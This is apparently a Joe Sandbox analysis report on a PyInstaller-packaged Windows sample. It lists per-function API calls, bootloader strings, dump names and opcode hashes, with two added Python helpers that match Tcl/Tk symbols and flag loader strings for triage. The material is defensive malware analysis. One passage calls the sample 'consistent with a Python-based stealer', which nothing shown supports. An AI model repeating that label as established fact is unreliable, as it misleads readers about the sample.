                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                    • Instruction ID: 56f793aae0d201c7bbf6eeed329dfeed23f16440cb7575140ceff2c0fa2710f1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3F044717182A58ADBA89F69A402629B7D1F7483D0F908039D5C983F04DB7C9061CF24
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                    • Instruction ID: f785e3ceab1f783541610a07cb0be301756ccaa23c41d077ab108202e995945e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92A0022590CC0AD0E644AF11E8E1035A332FB52330FC40031E18DB5AB0AFBCA400D335
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                    • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                    • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                    • Instruction ID: 306ba11d9e9725e2f8d414c8a1269bf14dfd424d964dc69a7746be179d1449be
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86028028A0DB8BD1EA55BF65A810974E2A3BF04775FD40135D49E62BA0EFFCA548C334
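The String ID field of the record above lists the Tcl_*/Tk_* export names this function resolves by name (GetProcAddress, with "Failed to get address for %hs" as its failure message). A practitioner will usually want to turn such a string set into a reusable check rather than eyeball it. The following Python is an added triage helper, not part of the Joe Sandbox report or of the analysed sample: it parses the report's '$'-separated String ID field, separates the Tcl/Tk symbol names from the other strings, and scans a byte buffer for NUL-terminated ASCII or UTF-16LE copies of each. The buffer it scans is constructed inline; the 80% match threshold and the choice of encodings are assumptions.

```python
import re

# Copied verbatim from the report's "String ID" field; Joe Sandbox joins the
# individual strings of a function with '$'.
REPORT_STRING_ID = (
    "Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize"
    "$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand"
    "$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile"
    "$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free"
    "$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init"
    "$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock"
    "$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex"
    "$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init"
)
FAILURE_FORMAT = "Failed to get address for %hs"


def parse_string_id(field):
    """Split a Joe Sandbox 'String ID' field into its individual strings."""
    return [s for s in field.split("$") if s]


def split_symbol_list(strings):
    """Separate Tcl_/Tk_ export names from the remaining strings."""
    symbols = [s for s in strings if re.fullmatch(r"T(cl|k)_\w+", s)]
    other = [s for s in strings if s not in symbols]
    return symbols, other


def find_offsets(blob, needle):
    """Offsets of needle as NUL-terminated ASCII or UTF-16LE.

    The terminator is part of the pattern so that Tcl_SetVar2 does not match
    inside Tcl_SetVar2Ex and Tcl_Finalize does not match inside
    Tcl_FinalizeThread.
    """
    hits = []
    encodings = (needle.encode("ascii") + b"\x00",
                 needle.encode("utf-16-le") + b"\x00\x00")
    for enc in encodings:
        start = 0
        while (i := blob.find(enc, start)) != -1:
            hits.append(i)
            start = i + 1
    return sorted(hits)


def tcl_loader_check(blob, min_fraction=0.8):
    """Report how much of the Tcl/Tk symbol set from the report is in blob.

    A match requires both the failure format string and at least
    min_fraction (assumed 0.8) of the 33 symbol names.
    """
    symbols, _other = split_symbol_list(parse_string_id(REPORT_STRING_ID))
    present = [s for s in symbols if find_offsets(blob, s)]
    has_failure_string = bool(find_offsets(blob, FAILURE_FORMAT))
    fraction = len(present) / len(symbols)
    return {
        "symbols_total": len(symbols),
        "symbols_present": len(present),
        "missing": sorted(set(symbols) - set(present)),
        "has_failure_string": has_failure_string,
        "match": fraction >= min_fraction and has_failure_string,
    }


def build_sample(drop=(), include_failure_string=True):
    """Constructed test buffer (not a real dump): a fake name table of
    NUL-terminated ASCII symbols plus the format string stored as UTF-16LE,
    the form a wide-character %hs format string takes in a Windows binary."""
    symbols, _other = split_symbol_list(parse_string_id(REPORT_STRING_ID))
    parts = [b"MZ" + b"\x00" * 62]
    parts += [s.encode("ascii") + b"\x00" for s in symbols if s not in drop]
    if include_failure_string:
        parts.append(FAILURE_FORMAT.encode("utf-16-le") + b"\x00\x00")
    return b"".join(parts)


if __name__ == "__main__":
    print(tcl_loader_check(build_sample()))
    print(tcl_loader_check(build_sample(drop=("Tcl_Init", "Tk_Init")))["missing"])
    print(tcl_loader_check(build_sample(include_failure_string=False))["match"])
```

Replace `build_sample()` with the bytes of a PE or a `.sdmp` memory dump to run the same check on real input; the `missing` list shows which names a partially matching loader lacks, which is the first thing to inspect when a variant drops or renames symbols.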
APIs
  • Part of subcall function 00007FF7C2669400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C26645E4,00000000,00007FF7C2661985), ref: 00007FF7C2669439
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C26688A7,?,?,00000000,00007FF7C2663CBB), ref: 00007FF7C266821C
  • Part of subcall function 00007FF7C2662810: MessageBoxW.USER32 ref: 00007FF7C26628EA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                    • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                    • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                                    • Instruction ID: 85ed38db19c7a4a2bdf58e851b1d06c7e56c01a1d69b3130a42f58656636a00b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D518751A1864291FB50BF31E8556BAE273AF947A0FC44031D58EA6F95EEBCE408C374
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction ID: fe2e289fce019b1a42e0a73b8978909a0e3183056485ac487edc92353faf8931
• Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction Fuzzy Hash: 0651F826604BA186D6349F36E4181BAF7A2F798B61F004125EFDE83B95DF7CD045DB20
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction ID: 943e3dc65ce24df7ccebc768ef81b8a2eef069d0b423ea26c178f2d78258173f
• Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction Fuzzy Hash: B8219B21B08642C1E7516F75E854179E272FF88BB0F984130DA9D93BA5DE7CD544C334
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: 45cfd66363752524c2264dc62b9af40e5ded7360e43e65be339fb8b8f7423c06
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 68125E62A0814386FB24BE15B1542B9B6A3FB40F64FD44135E6DA66FC4DBBCE580CB31
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 8513f3dbb65ed212844400f80a2f7b3769c6d654bbd61cf483d7828a604a30d0
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: FD126022E0C14386FB20BE19B054679A663EB50F64FD84076E6D966FC4DBBCE584DB30
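The entries above are Joe Sandbox per-function analysis records for the main module dump of process 4. The Python below is an added example, not part of this report and not Joe Sandbox code: it parses such records (the sample input is constructed from records on this page, with hashes truncated) into structured rows, decodes the base address and page protection from the .sdmp file name (the position of those two fields inside the name is an assumption drawn from the names on this page), checks that each Opcode ID agrees with its Opcode Fuzzy Hash, and flags the "LOADER: ..." and "Needs to remove its temporary files." strings. Those strings are messages the PyInstaller bootloader emits while it unpacks and later removes its temporary files, which is consistent with a Python-based stealer packaged with PyInstaller and is worth surfacing automatically when triaging a report of this size.

```python
"""Parse Joe Sandbox per-function records and flag PyInstaller bootloader strings.

Added example for this report page; it is not Joe Sandbox code. The field
positions inside the .sdmp file name are an assumption based on the names seen
on this page.
"""
import re
from dataclasses import dataclass, field

# Windows page-protection constants (winnt.h) used to read the dump name.
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# Messages printed by the PyInstaller bootloader while unpacking its archive.
PYINSTALLER_MARKERS = ("LOADER:", "Needs to remove its temporary files.")

API_CALL = re.compile(r"•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?(\w+)\.(\w+)")
KEYED = re.compile(r"•\s+([A-Za-z ]+?):\s*(.*)")
SECTION_HEADERS = ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# Constructed sample: three records copied from this page, hashes truncated.
SAMPLE = """\
APIs
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C26688A7,?,?,00000000,00007FF7C2663CBB), ref: 00007FF7C266821C
  • Part of subcall function 00007FF7C2662810: MessageBoxW.USER32 ref: 00007FF7C26628EA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$\\
• API String ID: 1662231829-930877121
• Opcode ID: e491f33a4545c5dc
• Opcode Fuzzy Hash: e491f33a4545c5dc
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• Opcode ID: 1b4b32be61da5f45
• Opcode Fuzzy Hash: 1b4b32be61da5f45
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• Opcode ID: 044398bc2faddcfc
• Opcode Fuzzy Hash: 044398bc2faddcfc
"""


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)       # (api, module) pairs, subcalls included
    source_dump: str = ""
    base_address: int = 0
    protection: str = "UNKNOWN"
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # remaining "Key: value" bullets
    strings: list = field(default_factory=list)     # String ID split on '$'

    def hashes_consistent(self) -> bool:
        """On this report every Opcode ID equals its Opcode Fuzzy Hash."""
        return self.fields.get("Opcode ID") == self.fields.get("Opcode Fuzzy Hash")

    def pyinstaller_indicator(self) -> bool:
        return any(s.startswith(PYINSTALLER_MARKERS) for s in self.strings)


def decode_dump_name(name: str):
    """Read base address and protection from '<proc>.<dump>.<id>.<base>.<protect>...sdmp' (assumed layout)."""
    parts = name.removesuffix(".sdmp").split(".")
    base, protect = int(parts[3], 16), int(parts[4], 16)
    return base, PAGE_PROTECTION.get(protect, f"0x{protect:X}")


def parse_records(text: str):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                        # each record on the page starts here
            current = FunctionRecord()
            records.append(current)
            section = "apis"
            continue
        if current is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "apis":
            m = API_CALL.match(line)
            if m:
                current.apis.append((m.group(1), m.group(2)))
            continue
        m = KEYED.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            current.source_dump = value.split(",")[0]
            current.base_address, current.protection = decode_dump_name(current.source_dump)
        elif key == "Associated":
            current.associated.append(value)
        elif key == "String ID":
            current.strings = value.split("$")
        else:
            current.fields[key] = value
    return records


def triage(text: str):
    """Return (API ID, protection, PyInstaller flag) per record; raise if hashes disagree."""
    rows = []
    for rec in parse_records(text):
        if not rec.hashes_consistent():
            raise ValueError(f"Opcode ID / fuzzy hash mismatch in {rec.fields.get('API ID')}")
        rows.append((rec.fields.get("API ID", ""), rec.protection, rec.pyinstaller_indicator()))
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Running the block prints one row per record; the two records carrying bootloader strings are flagged while the MoveWindow record is not. On a full report, feeding the whole function listing through `triage` and sorting on the flag is a quick way to locate the loader's unpack and cleanup routines before looking at the Python payload itself.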
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
APIs
Strings
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662D63
• MessageBoxW.USER32 ref: 00007FF7C2662D99
Strings
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DDBD
• GetLastError.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DDCB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DDF5
• FreeLibrary.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DE63
• GetProcAddress.KERNEL32(?,?,?,00007FF7C266DFEA,?,?,?,00007FF7C266DCDC,?,?,?,00007FF7C266D8D9), ref: 00007FF7C266DE6F
Strings
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
Strings
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7C266351A,?,00000000,00007FF7C2663F23), ref: 00007FF7C2662AA0
Strings
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
APIs
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Strings
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7C2669216), ref: 00007FF7C2668592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C26685E9
  • Part of subcall function 00007FF7C2669400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C26645E4,00000000,00007FF7C2661985), ref: 00007FF7C2669439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C2668678
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C26686E4
• FreeLibrary.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C26686F5
• FreeLibrary.KERNEL32(?,?,00000000,00007FF7C2669216), ref: 00007FF7C266870A
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
                                                                                                                                                                                                                                                                    • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                                    • Instruction ID: f42f330bcf78f77c00130167690d867ba23e71ba7eb3f7b2cd23e656e472fa11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A419862B1968241E630AF21A5446AAA3B6FF84BE4F840135DFCDA7F85DE7CD405C734
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B347
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C2674F81,?,?,?,?,00007FF7C267A4FA,?,?,?,?,00007FF7C26771FF), ref: 00007FF7C267B37D
